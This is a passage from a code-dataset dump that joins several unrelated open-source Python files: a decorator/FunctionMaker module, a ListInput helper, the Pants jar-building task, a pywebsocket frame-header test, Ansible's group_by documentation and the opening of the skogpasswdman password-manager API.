def get_init(cls):
return cls.__init__
else:
class getfullargspec(object):
"A quick and dirty replacement for getfullargspec for Python 2.X"
def __init__(self, f):
self.args, self.varargs, self.varkw, self.defaults = \
inspect.getargspec(f)
self.kwonlyargs = []
self.kwonlydefaults = None
def __iter__(self):
yield self.args
yield self.varargs
yield self.varkw
yield self.defaults
def get_init(cls):
return cls.__init__.im_func
DEF = re.compile('\s*def\s*([_\w][_\w\d]*)\s*\(')
# basic functionality
class FunctionMaker(object):
"""
An object with the ability to create functions with a given signature.
It has attributes name, doc, module, signature, defaults, dict and
methods update and make.
"""
def __init__(self, func=None, name=None, signature=None,
defaults=None, doc=None, module=None, funcdict=None):
self.shortsignature = signature
if func:
# func can be a class or a callable, but not an instance method
self.name = func.__name__
if self.name == '<lambda>': # small hack for lambda functions
self.name = '_lambda_'
self.doc = func.__doc__
self.module = func.__module__
if inspect.isfunction(func):
argspec = getfullargspec(func)
self.annotations = getattr(func, '__annotations__', {})
for a in ('args', 'varargs', 'varkw', 'defaults', 'kwonlyargs',
'kwonlydefaults'):
setattr(self, a, getattr(argspec, a))
for i, arg in enumerate(self.args):
setattr(self, 'arg%d' % i, arg)
if sys.version < '3': # easy way
self.shortsignature = self.signature = \
inspect.formatargspec(
formatvalue=lambda val: "", *argspec)[1:-1]
else: # Python 3 way
allargs = list(self.args)
allshortargs = list(self.args)
if self.varargs:
allargs.append('*' + self.varargs)
allshortargs.append('*' + self.varargs)
elif self.kwonlyargs:
allargs.append('*') # single star syntax
for a in self.kwonlyargs:
allargs.append('%s=None' % a)
allshortargs.append('%s=%s' % (a, a))
if self.varkw:
allargs.append('**' + self.varkw)
allshortargs.append('**' + self.varkw)
self.signature = ', '.join(allargs)
self.shortsignature = ', '.join(allshortargs)
self.dict = func.__dict__.copy()
# func=None happens when decorating a caller
if name:
self.name = name
if signature is not None:
self.signature = signature
if defaults:
self.defaults = defaults
if doc:
self.doc = doc
if module:
self.module = module
if funcdict:
self.dict = funcdict
# check existence required attributes
assert hasattr(self, 'name')
if not hasattr(self, 'signature'):
raise TypeError('You are decorating a non function: %s' % func)
def update(self, func, **kw):
"Update the signature of func with the data in self"
func.__name__ = self.name
func.__doc__ = getattr(self, 'doc', None)
func.__dict__ = getattr(self, 'dict', {})
func.func_defaults = getattr(self, 'defaults', ())
func.__kwdefaults__ = getattr(self, 'kwonlydefaults', None)
func.__annotations__ = getattr(self, 'annotations', None)
callermodule = sys._getframe(3).f_globals.get('__name__', '?')
func.__module__ = getattr(self, 'module', callermodule)
func.__dict__.update(kw)
def make(self, src_templ, evaldict=None, addsource=False, **attrs):
"Make a new function from a given template and update the signature"
src = src_templ % vars(self) # expand name and signature
evaldict = evaldict or {}
mo = DEF.match(src)
if mo is None:
raise SyntaxError('not a valid function template\n%s' % src)
name = mo.group(1) # extract the function name
names = set([name] + [arg.strip(' *') for arg in
self.shortsignature.split(',')])
for n in names:
if n in ('_func_', '_call_'):
raise NameError('%s is overridden in\n%s' % (n, src))
if not src.endswith('\n'): # add a newline just for safety
src += '\n' # this is needed in old versions of Python
try:
code = compile(src, '<string>', 'single')
# print >> sys.stderr, 'Compiling %s' % src
exec code in evaldict
except:
print >> sys.stderr, 'Error in generated code:'
print >> sys.stderr, src
raise
func = evaldict[name]
if addsource:
attrs['__source__'] = src
self.update(func, **attrs)
return func
@classmethod
def create(cls, obj, body, evaldict, defaults=None,
doc=None, module=None, addsource=True, **attrs):
"""
Create a function from the strings name, signature and body.
evaldict is the evaluation dictionary. If addsource is true an attribute
__source__ is added to the result. The attributes attrs are added,
if any.
"""
if isinstance(obj, str): # "name(signature)"
name, rest = obj.strip().split('(', 1)
            signature = rest[:-1]  # strip the trailing right paren
func = None
else: # a function
name = None
signature = None
func = obj
self = cls(func, name, signature, defaults, doc, module)
ibody = '\n'.join(' ' + line for line in body.splitlines())
return self.make('def %(name)s(%(signature)s):\n' + ibody,
evaldict, addsource, **attrs)
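# A minimal sketch of FunctionMaker.create (illustrative only, using just the arguments
# documented above):
#   f = FunctionMaker.create('f(x, y)', 'return x + y', dict())
#   # f is a real function named 'f' with signature (x, y); f(2, 3) == 5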
def decorator(caller, func=None):
"""
decorator(caller) converts a caller function into a decorator;
decorator(caller, func) decorates a function using a caller.
"""
if func is not None: # returns a decorated function
evaldict = func.func_globals.copy()
evaldict['_call_'] = caller
evaldict['_func_'] = func
return FunctionMaker.create(
func, "return _call_(_func_, %(shortsignature)s)",
evaldict, undecorated=func, __wrapped__=func)
else: # returns a decorator
if inspect.isclass(caller):
name = caller.__name__.lower()
callerfunc = get_init(caller)
doc = 'decorator(%s) converts functions/generators into ' \
'factories of %s objects' % (caller.__name__, caller.__name__)
fun = getfullargspec(callerfunc).args[1] # second arg
elif inspect.isfunction(caller):
name = '_lambda_' if caller.__name__ == '<lambda>' \
else caller.__name__
callerfunc = caller
doc = caller.__doc__
fun = getfullargspec(callerfunc).args[0] # first arg
else: # assume caller is an object with a __call__ method
name = caller.__class__.__name__.lower()
callerfunc = caller.__call__.im_func
doc = caller.__call__.__doc__
fun = getfullargspec(callerfunc).args[1] # second arg
evaldict = callerfunc.func_globals.copy()
evaldict['_call_'] = caller
evaldict['decorator'] = decorator
return FunctionMaker.create(
'%s(%s)' % (name, fun),
'return decorator(_call_, %s)' % fun,
evaldict, undecorated=caller, __wrapped__=caller,
doc=doc, module=caller.__module__)
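# A short usage sketch (illustrative; mirrors the canonical pattern for this module):
#   @decorator
#   def trace(f, *args, **kw):
#       print 'calling %s with args %s, %s' % (f.__name__, args, kw)
#       return f(*args, **kw)
#
#   @trace
#   def add(x, y):
#       return x + y
#   add(1, 2)  # prints the call details, then returns 3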
######################### contextmanager ########################
def __call__(self, func):
'Context manager decorator'
return FunctionMaker.create(
func, "with _self_: return _func_(%(shortsignature)s)",
dict(_self_=self, _func_=func), __wrapped__=func)
try: # Python >= 3.2
from contextlib import _GeneratorContextManager
ContextManager = type(
'ContextManager', (_GeneratorContextManager,), dict(__call__=__call__))
except ImportError: # Python >= 2.5
from contextlib import GeneratorContextManager
def __init__(self, f, *a, **k):
return GeneratorContextManager.__init__(self, f(*a, **k))
ContextManager = type(
'ContextManager', (GeneratorContextManager,),
dict(__call__=__call__, __init__=__init__))
contextmanager = decorator(ContextManager)
|
tiy1807/PythonUtils | refs/heads/master | PythonUtils/list_input.py | 1 | # ------------------------------------------------------------------------------
# Class ListInput
#
# Allows the same Input object to be requested multiple times, either a
# predefined number of times or until the user enters the 'finished' sequence.
# ------------------------------------------------------------------------------
from PythonUtils.option import Option
from PythonUtils.user_input import UserInput
class ListInput:
REPEAT_TILL_TERMINATED = 0
REPEAT_FINITELY = 1
def __init__(self, input, repeats):
self.input = input
finished_opt = Option(name="\\finished", short_name="\\f", help_text="Stops asking this question")
self.input.master_options.append(finished_opt)
self.input.default_opt = finished_opt
self.input.default = finished_opt.short_name
self.repeats = repeats
if self.repeats == self.REPEAT_TILL_TERMINATED:
self.termination = self.REPEAT_TILL_TERMINATED
elif self.repeats > 0:
self.termination = self.REPEAT_FINITELY
self.answer = []
def get_answer(self):
return self.answer
def request_input(self):
ask_again = True
number_of_asks = 0
while ask_again:
rc = self.input.request_input()
answer = self.input.get_answer()
if rc == UserInput.SUCCESS:
if self.termination == self.REPEAT_FINITELY:
ask_again = (number_of_asks < self.repeats)
elif self.termination == self.REPEAT_TILL_TERMINATED:
ask_again = (answer != "\\finished")
else:
raise ValueError()
else:
ask_again = (rc != UserInput.ABORTED)
if (answer != "\\finished"):
self.answer.append(self.input.get_answer())
number_of_asks += 1
return rc
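# A minimal usage sketch (hypothetical; constructing and configuring the wrapped UserInput
# instance is outside this module and not shown here):
#   question = UserInput(...)  # any configured UserInput
#   answers = ListInput(question, ListInput.REPEAT_TILL_TERMINATED)
#   if answers.request_input() != UserInput.ABORTED:
#       print(answers.get_answer())  # every value entered before the \finished sequence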
|
foursquare/pants | refs/heads/master | src/python/pants/backend/jvm/tasks/jar_task.py | 1 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import shutil
import tempfile
from abc import abstractmethod
from builtins import object
from contextlib import contextmanager
import six
from six import binary_type, string_types
from twitter.common.collections import maybe_list
from pants.backend.jvm.argfile import safe_args
from pants.backend.jvm.subsystems.jar_tool import JarTool
from pants.backend.jvm.targets.java_agent import JavaAgent
from pants.backend.jvm.targets.jvm_binary import Duplicate, JarRules, JvmBinary, Skip
from pants.backend.jvm.tasks.classpath_util import ClasspathUtil
from pants.backend.jvm.tasks.nailgun_task import NailgunTask
from pants.base.exceptions import TaskError
from pants.java.jar.manifest import Manifest
from pants.java.util import relativize_classpath
from pants.util.contextutil import temporary_dir
from pants.util.dirutil import safe_mkdtemp
from pants.util.meta import AbstractClass
class Jar(object):
"""Encapsulates operations to build up or update a jar file.
Upon construction the jar is conceptually opened for writes. The write methods are called to
add to the jar's contents and then changes are finalized with a call to close. If close is not
called the staged changes will be lost.
:API: public
"""
class Error(Exception):
"""Indicates an error creating or updating a jar on disk."""
class Entry(AbstractClass):
"""An entry to be written to a jar."""
def __init__(self, dest):
self._dest = dest
@property
def dest(self):
"""The destination path of the entry in the jar."""
return self._dest
def split_manifest(self):
"""Splits this entry into a jar non-manifest part and a manifest part.
Some entries represent a manifest, some do not, and others have both a manifest entry and
non-manifest entries; as such, callers must be prepared to handle ``None`` entries.
:returns: A tuple of (non-manifest Entry, manifest Entry).
:rtype: tuple of (:class:`Jar.Entry`, :class:`Jar.Entry`)
"""
if self.dest == Manifest.PATH:
return None, self
else:
return self, None
@abstractmethod
def materialize(self, scratch_dir):
"""Materialize this entry's source data into a filesystem path.
:param string scratch_dir: A temporary directory that may be used to do any work required
to materialize the entry as a source file. The caller is responsible for cleaning up
`scratch_dir` after the jar is closed.
:returns: The path to the source data.
"""
class FileSystemEntry(Entry):
"""An entry backed by an existing file on disk."""
def __init__(self, src, dest=None):
super(Jar.FileSystemEntry, self).__init__(dest)
self._src = src
def split_manifest(self):
if not os.path.isdir(self._src):
return super(Jar.FileSystemEntry, self).split_manifest()
if self.dest and self.dest == os.path.commonprefix([self.dest, Manifest.PATH]):
manifest_relpath = os.path.relpath(Manifest.PATH, self.dest)
else:
manifest_relpath = Manifest.PATH
manifest_path = os.path.join(self._src, manifest_relpath)
if os.path.isfile(manifest_path):
manifest_entry = Jar.FileSystemEntry(manifest_path, dest=Manifest.PATH)
non_manifest_chroot = os.path.join(safe_mkdtemp(), 'chroot')
shutil.copytree(self._src, non_manifest_chroot)
os.unlink(os.path.join(non_manifest_chroot, manifest_relpath))
return Jar.FileSystemEntry(non_manifest_chroot), manifest_entry
else:
return self, None
def materialize(self, _):
return self._src
class MemoryEntry(Entry):
"""An entry backed by an in-memory sequence of bytes."""
def __init__(self, dest, contents):
super(Jar.MemoryEntry, self).__init__(dest)
self._contents = contents
def materialize(self, scratch_dir):
fd, path = tempfile.mkstemp(dir=scratch_dir)
try:
os.write(fd, self._contents)
finally:
os.close(fd)
return path
def __init__(self, path):
self._path = path
self._entries = []
self._jars = []
self._manifest_entry = None
self._main = None
self._classpath = []
@property
def classpath(self):
"""The Class-Path entry of jar's Manifest."""
return self._classpath
@property
def path(self):
"""The path to jar itself."""
return self._path
def main(self, main):
"""Specifies a Main-Class entry for this jar's manifest.
:param string main: a fully qualified class name
"""
if not main or not isinstance(main, string_types):
raise ValueError('The main entry must be a non-empty string')
self._main = main
def append_classpath(self, classpath):
"""Specifies a Class-Path entry for this jar's manifest.
If called multiple times, new entry will be appended to the existing classpath.
:param iterable classpath: a list of paths
"""
self._classpath = self._classpath + maybe_list(classpath)
def write(self, src, dest=None):
"""Schedules a write of the file at ``src`` to the ``dest`` path in this jar.
If the ``src`` is a file, then ``dest`` must be specified.
If the ``src`` is a directory then by default all descendant files will be added to the jar as
entries carrying their relative path. If ``dest`` is specified it will be prefixed to each
descendant's relative path to form its jar entry path.
:param string src: the path to the pre-existing source file or directory
:param string dest: the path the source file or directory should have in this jar
"""
if not src or not isinstance(src, string_types):
raise ValueError('The src path must be a non-empty string, got {} of type {}.'.format(
src, type(src)))
if dest and not isinstance(dest, string_types):
raise ValueError('The dest entry path must be a non-empty string, got {} of type {}.'.format(
dest, type(dest)))
if not os.path.isdir(src) and not dest:
raise self.Error('Source file {} must have a jar destination specified'.format(src))
self._add_entry(self.FileSystemEntry(src, dest))
def writestr(self, path, contents):
"""Schedules a write of the file ``contents`` to the given ``path`` in this jar.
:param string path: the path to write the contents to in this jar
:param string contents: the raw byte contents of the file to write to ``path``
"""
if not path or not isinstance(path, string_types):
raise ValueError('The path must be a non-empty string')
if contents is None or not isinstance(contents, binary_type):
raise ValueError('The contents must be a sequence of bytes')
self._add_entry(self.MemoryEntry(path, contents))
def _add_entry(self, entry):
non_manifest, manifest = entry.split_manifest()
if manifest:
self._manifest_entry = manifest
if non_manifest:
self._entries.append(non_manifest)
def writejar(self, jar):
"""Schedules all entries from the given ``jar``'s to be added to this jar save for the manifest.
:param string jar: the path to the pre-existing jar to graft into this jar
"""
if not jar or not isinstance(jar, string_types):
raise ValueError('The jar path must be a non-empty string')
self._jars.append(jar)
@contextmanager
def _render_jar_tool_args(self, options):
"""Format the arguments to jar-tool.
:param Options options:
"""
args = []
with temporary_dir() as manifest_stage_dir:
# Relativize URLs in the canonical classpath. This needs to be stable as well, so
# do not follow symlinks, because symlink layouts may vary from platform to platform.
classpath = relativize_classpath(self.classpath,
os.path.dirname(self._path),
followlinks=False)
def as_cli_entry(entry):
src = entry.materialize(manifest_stage_dir)
return '{}={}'.format(src, entry.dest) if entry.dest else src
files = [as_cli_entry(entry) for entry in self._entries] if self._entries else []
jars = self._jars or []
with safe_args(classpath, options, delimiter=',') as classpath_args:
with safe_args(files, options, delimiter=',') as files_args:
with safe_args(jars, options, delimiter=',') as jars_args:
# If you specify --manifest to jar-tool you cannot specify --main.
if self._manifest_entry:
manifest_file = self._manifest_entry.materialize(manifest_stage_dir)
else:
manifest_file = None
if self._main and manifest_file:
main_arg = None
with open(manifest_file, 'a') as f:
f.write("Main-Class: {}\n".format(self._main))
else:
main_arg = self._main
if main_arg:
args.append('-main={}'.format(main_arg))
if classpath_args:
args.append('-classpath={}'.format(','.join(classpath_args)))
if manifest_file:
args.append('-manifest={}'.format(manifest_file))
if files_args:
args.append('-files={}'.format(','.join(files_args)))
if jars_args:
args.append('-jars={}'.format(','.join(jars_args)))
yield args
class JarTask(NailgunTask):
"""A baseclass for tasks that need to create or update jars.
All subclasses will share the same underlying nailgunned jar tool and thus benefit from fast
invocations.
:API: public
"""
@classmethod
def subsystem_dependencies(cls):
return super(JarTask, cls).subsystem_dependencies() + (JarTool,)
@classmethod
def prepare(cls, options, round_manager):
super(JarTask, cls).prepare(options, round_manager)
JarTool.prepare_tools(round_manager)
@staticmethod
def _flag(bool_value):
return 'true' if bool_value else 'false'
_DUPLICATE_ACTION_TO_NAME = {
Duplicate.SKIP: 'SKIP',
Duplicate.REPLACE: 'REPLACE',
Duplicate.CONCAT: 'CONCAT',
Duplicate.CONCAT_TEXT: 'CONCAT_TEXT',
Duplicate.FAIL: 'THROW',
}
@classmethod
def _action_name(cls, action):
name = cls._DUPLICATE_ACTION_TO_NAME.get(action)
if name is None:
raise ValueError('Unrecognized duplicate action: {}'.format(action))
return name
def __init__(self, *args, **kwargs):
super(JarTask, self).__init__(*args, **kwargs)
self.set_distribution(jdk=True)
# TODO(John Sirois): Consider poking a hole for custom jar-tool jvm args - namely for Xmx
# control.
@contextmanager
def open_jar(self, path, overwrite=False, compressed=True, jar_rules=None):
"""Yields a Jar that will be written when the context exits.
:API: public
:param string path: the path to the jar file
:param bool overwrite: overwrite the file at ``path`` if it exists; ``False`` by default, i.e.
the pre-existing jar at ``path`` is updated
:param bool compressed: entries added to the jar should be compressed; ``True`` by default
:param jar_rules: an optional set of rules for handling jar exclusions and duplicates
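Illustrative usage from a task's execute() (a sketch; `jar_path`, `classes_dir` and the
main class are hypothetical):
with self.open_jar(jar_path, overwrite=True, compressed=True) as jar:
jar.main('org.example.Main')
jar.write(classes_dir)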
"""
jar = Jar(path)
try:
yield jar
except jar.Error as e:
raise TaskError('Failed to write to jar at {}: {}'.format(path, e))
with jar._render_jar_tool_args(self.get_options()) as args:
if args: # Don't build an empty jar
args.append('-update={}'.format(self._flag(not overwrite)))
args.append('-compress={}'.format(self._flag(compressed)))
jar_rules = jar_rules or JarRules.default()
args.append('-default_action={}'.format(self._action_name(jar_rules.default_dup_action)))
skip_patterns = []
duplicate_actions = []
for rule in jar_rules.rules:
if isinstance(rule, Skip):
skip_patterns.append(rule.apply_pattern)
elif isinstance(rule, Duplicate):
duplicate_actions.append('{}={}'.format(
rule.apply_pattern.pattern, self._action_name(rule.action)))
else:
raise ValueError('Unrecognized rule: {}'.format(rule))
if skip_patterns:
args.append('-skip={}'.format(','.join(p.pattern for p in skip_patterns)))
if duplicate_actions:
args.append('-policies={}'.format(','.join(duplicate_actions)))
args.append(path)
if JarTool.global_instance().run(context=self.context, runjava=self.runjava, args=args):
raise TaskError('jar-tool failed')
class JarBuilderTask(JarTask):
class JarBuilder(AbstractClass):
"""A utility to aid in adding the classes and resources associated with targets to a jar.
:API: public
"""
@staticmethod
def _add_agent_manifest(agent, manifest):
# TODO(John Sirois): refactor an agent model to support 'Boot-Class-Path' properly.
manifest.addentry(Manifest.MANIFEST_VERSION, '1.0')
if agent.premain:
manifest.addentry('Premain-Class', agent.premain)
if agent.agent_class:
manifest.addentry('Agent-Class', agent.agent_class)
if agent.can_redefine:
manifest.addentry('Can-Redefine-Classes', 'true')
if agent.can_retransform:
manifest.addentry('Can-Retransform-Classes', 'true')
if agent.can_set_native_method_prefix:
manifest.addentry('Can-Set-Native-Method-Prefix', 'true')
@staticmethod
def _add_manifest_entries(jvm_binary_target, manifest):
"""Add additional fields to MANIFEST.MF as declared in the ManifestEntries structure.
:param JvmBinary jvm_binary_target:
:param Manifest manifest:
"""
for header, value in six.iteritems(jvm_binary_target.manifest_entries.entries):
manifest.addentry(header, value)
@staticmethod
def prepare(round_manager):
"""Prepares the products needed to use `create_jar_builder`.
This method should be called during task preparation to ensure the classes and resources
needed for jarring targets are mapped by upstream tasks that generate these.
Later, in execute context, the `create_jar_builder` method can be called to get back a
prepared ``JarTask.JarBuilder`` ready for use.
"""
round_manager.require_data('runtime_classpath')
def __init__(self, context, jar):
self._context = context
self._jar = jar
self._manifest = Manifest()
def add_target(self, target, recursive=False):
"""Adds the classes and resources for a target to an open jar.
:param target: The target to add generated classes and resources for.
:param bool recursive: `True` to add classes and resources for the target's transitive
internal dependency closure.
:returns: `True` if the target contributed any files - manifest entries, classfiles or
resource files - to this jar.
:rtype: bool
"""
products_added = False
classpath_products = self._context.products.get_data('runtime_classpath')
# TODO(John Sirois): Manifest handling is broken. We should be tracking state and failing
# fast if any duplicate entries are added; ie: if we get a second binary or a second agent.
if isinstance(target, JvmBinary):
self._add_manifest_entries(target, self._manifest)
products_added = True
# Ensure that JavaAgent entries are added to the manifest. Either by adding all of the
# transitive JavaAgent deps, if recursive, or by adding the root target, if the root target
# is itself a JavaAgent.
if recursive:
agents = [t for t in target.closure() if isinstance(t, JavaAgent)]
if len(agents) > 1:
raise TaskError('Only 1 agent can be added to a jar, found {} for {}:\n\t{}'
.format(len(agents),
target.address.reference(),
'\n\t'.join(agent.address.reference() for agent in agents)))
elif agents:
self._add_agent_manifest(agents[0], self._manifest)
products_added = True
elif isinstance(target, JavaAgent):
self._add_agent_manifest(target, self._manifest)
products_added = True
# In the transitive case we'll gather internal resources naturally as dependencies, but in the
# non-transitive case we need to manually add these special (in the context of jarring)
# dependencies.
targets = target.closure(bfs=True) if recursive else [target]
if not recursive and target.has_resources:
targets += target.resources
# We only gather internal classpath elements per our contract.
target_classpath = ClasspathUtil.internal_classpath(targets,
classpath_products)
for entry in target_classpath:
if ClasspathUtil.is_jar(entry):
self._jar.writejar(entry)
products_added = True
elif ClasspathUtil.is_dir(entry):
for rel_file in ClasspathUtil.classpath_entries_contents([entry]):
self._jar.write(os.path.join(entry, rel_file), rel_file)
products_added = True
else:
# non-jar and non-directory classpath entries should be ignored
pass
return products_added
def commit_manifest(self, jar):
"""Updates the manifest in the jar being written to.
Typically done right before closing the .jar. This gives a chance for all targets to bundle
in their contributions to the manifest.
"""
if not self._manifest.is_empty():
jar.writestr(Manifest.PATH, self._manifest.contents())
@classmethod
def prepare(cls, options, round_manager):
super(JarBuilderTask, cls).prepare(options, round_manager)
cls.JarBuilder.prepare(round_manager)
@contextmanager
def create_jar_builder(self, jar):
"""Creates a ``JarTask.JarBuilder`` ready for use.
This method should be called in the `execute` context and only after ensuring
`JarTask.JarBuilder.prepare` has already been called in the `prepare` context.
:param jar: An opened ``pants.backend.jvm.tasks.jar_task.Jar``.
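Illustrative usage (a sketch; `jar_path` and `binary_target` are hypothetical):
with self.open_jar(jar_path) as jar:
with self.create_jar_builder(jar) as jar_builder:
jar_builder.add_target(binary_target, recursive=True)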
"""
builder = self.JarBuilder(self.context, jar)
yield builder
builder.commit_manifest(jar)
|
espadrine/opera | refs/heads/master | chromium/src/third_party/pywebsocket/src/test/test_stream.py | 496 | #!/usr/bin/env python
#
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for stream module."""
import unittest
import set_sys_path # Update sys.path to locate mod_pywebsocket module.
from mod_pywebsocket import common
from mod_pywebsocket import stream
class StreamTest(unittest.TestCase):
"""A unittest for stream module."""
def test_create_header(self):
# more, rsv1, ..., rsv4 are all true
header = stream.create_header(common.OPCODE_TEXT, 1, 1, 1, 1, 1, 1)
self.assertEqual('\xf1\x81', header)
# Maximum payload size
header = stream.create_header(
common.OPCODE_TEXT, (1 << 63) - 1, 0, 0, 0, 0, 0)
self.assertEqual('\x01\x7f\x7f\xff\xff\xff\xff\xff\xff\xff', header)
# Invalid opcode 0x10
self.assertRaises(ValueError,
stream.create_header,
0x10, 0, 0, 0, 0, 0, 0)
# Invalid value 0xf passed to more parameter
self.assertRaises(ValueError,
stream.create_header,
common.OPCODE_TEXT, 0, 0xf, 0, 0, 0, 0)
# Too long payload_length
self.assertRaises(ValueError,
stream.create_header,
common.OPCODE_TEXT, 1 << 63, 0, 0, 0, 0, 0)
if __name__ == '__main__':
unittest.main()
# vi:sts=4 sw=4 et
|
tersmitten/ansible-modules-core | refs/heads/devel | inventory/group_by.py | 161 | # -*- mode: python -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: group_by
short_description: Create Ansible groups based on facts
description:
- Use facts to create ad-hoc groups that can be used later in a playbook.
version_added: "0.9"
options:
key:
description:
- The variables whose values will be used as groups
required: true
author: "Jeroen Hoekx (@jhoekx)"
notes:
- Spaces in group names are converted to dashes '-'.
'''
EXAMPLES = '''
# Create groups based on the machine architecture
- group_by: key=machine_{{ ansible_machine }}
# Create groups like 'kvm-host'
- group_by: key=virt_{{ ansible_virtualization_type }}_{{ ansible_virtualization_role }}
'''
|
oskar-skog/skogpasswdman | refs/heads/master | skogpasswdmanapi.py | 1 | # -*- coding: utf-8 -*-
copywrong = """
Copyright (c) 2013-2016, Oskar Skog <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE."""
__doc__ = """
skogpasswdmanapi - functions and classes used by skogpasswdman
Python 2/3 compatibility functions
----------------------------------
is_anystr(x)
is_bytestr(x)
is_unicodestr(x)
u(x)
b(x)
is_int(x)
is_num(x)
Classes
-------
passwd(common_data)
honeypot(common_data)
common_data() Internally used.
RNGs
----
get10(length) Internally used.
get64(length) Internally used.
getint(a, b) Internally used.
randomize(method, minlength, maxlength)
Misc.
-----
open_rng() Internally used.
unquote(x)
undo(passwdobj,honeypotobj)
redo(passwdobj,honeypotobj)
ckmkdir(d) Internally used. Not in man-page.
ckmkfile(f, content) Internally used. Not in man-page.
ope = os.path.expanduser Internally used. Not in man-page.
Progress-bar
------------
class progress_bar()
no_pb()
no_pb_f() Internally used.
Exceptions
----------
err_norandom(Exception)
err_nolength(Exception)
err_loaderr(Exception)
err_notfound(Exception)
err_duplicate(Exception)
err_idiot(Exception)
err_nometa(Exception)
NOTES
-----
What I call strings is really:
- Python 2: unicode
- Python 3: str
The `pb`-keyword argument, seen in lots of functions, expects a
`progress_bar`-object.
"""
import xml.etree.ElementTree as XML
import os.path
import time
import logging
import string
import sys
import locale
import fcntl
import re
class err_norandom(Exception):
"""class err_norandom(Exception)
Cannot open '/dev/random', cannot open '/dev/urandom'.
"""
pass
class err_nolength(Exception):
"""class err_nolength(Exception) - Invalid length (get10()
or get64()).
"""
pass
class err_loaderr(Exception):
"""class err_loaderr(Exception) - Failure to load data file (XML)."""
pass
class err_notfound(Exception):
"""class err_notfound(Exception)
The record in object.data cannot be found."""
pass
class err_duplicate(Exception):
"""class err_duplicate(Exception)
The value to be added already exist in object.data."""
pass
class err_idiot(Exception):
"""class err_idiot(Exception) - Incorrect usage."""
pass
class err_nometa(Exception):
"""class err_nometa(Exception) - Meta-data is required."""
pass
def is_int(x):
"""is_int(x) = True, False (is x int or long)"""
if isinstance(x, int):
return True
v, f, f, f, f = sys.version_info
if v == 2:
return isinstance(x, long)
return False
def is_num(x):
"""is_num(x) = True, False (is x a number)"""
return is_int(x) or isinstance(x, float)
def is_bytestr(x):
"""is_bytestr(x) = True, False (is x encoded/bytes)"""
v, f, f, f, f = sys.version_info
if v == 2:
return isinstance(x, str)
else:
return isinstance(x, bytes)
def is_unicodestr(x):
"""is_unicodestr(x) = True, False (is x decoded/unicode)"""
v, f, f, f, f = sys.version_info
if v == 2:
return isinstance(x, unicode)
else:
return isinstance(x, str)
def is_anystr(x):
"""is_anystr(x) = True, False (is x any kind of string)"""
if isinstance(x, str):
return True
v, f, f, f, f = sys.version_info
if v == 2:
return isinstance(x, unicode)
else:
return isinstance(x, bytes)
def u(x):
"""u(x) return a unicode/decoded string"""
assert is_anystr(x)
if not is_unicodestr(x):
return x.decode(code)
else:
return x
def b(x):
"""b(x) return a byte/encoded string"""
assert is_anystr(x)
if not is_bytestr(x):
return x.encode(code)
else:
return x
def b2u3(x):
"""b2u3(x)
b(x) if Python 2.x
u(x) if Python 3.x
"""
v, f, f, f, f = sys.version_info
if v == 2:
return b(x)
else:
return u(x)
ope = os.path.expanduser
def no_pb_f(percent, data):
"""no_pb_f(percent, data)
The actual function used by a progress bar created by `no_pb`.
"""
pass
def no_pb():
"""no_pb()
Return an invisible progress_bar.
"""
